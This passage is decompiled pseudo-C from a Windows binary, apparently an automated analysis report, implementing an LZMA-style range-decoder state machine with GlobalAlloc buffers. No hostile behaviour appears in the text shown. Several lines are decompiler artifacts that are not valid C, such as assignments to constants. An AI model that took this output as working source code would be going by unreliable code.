						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
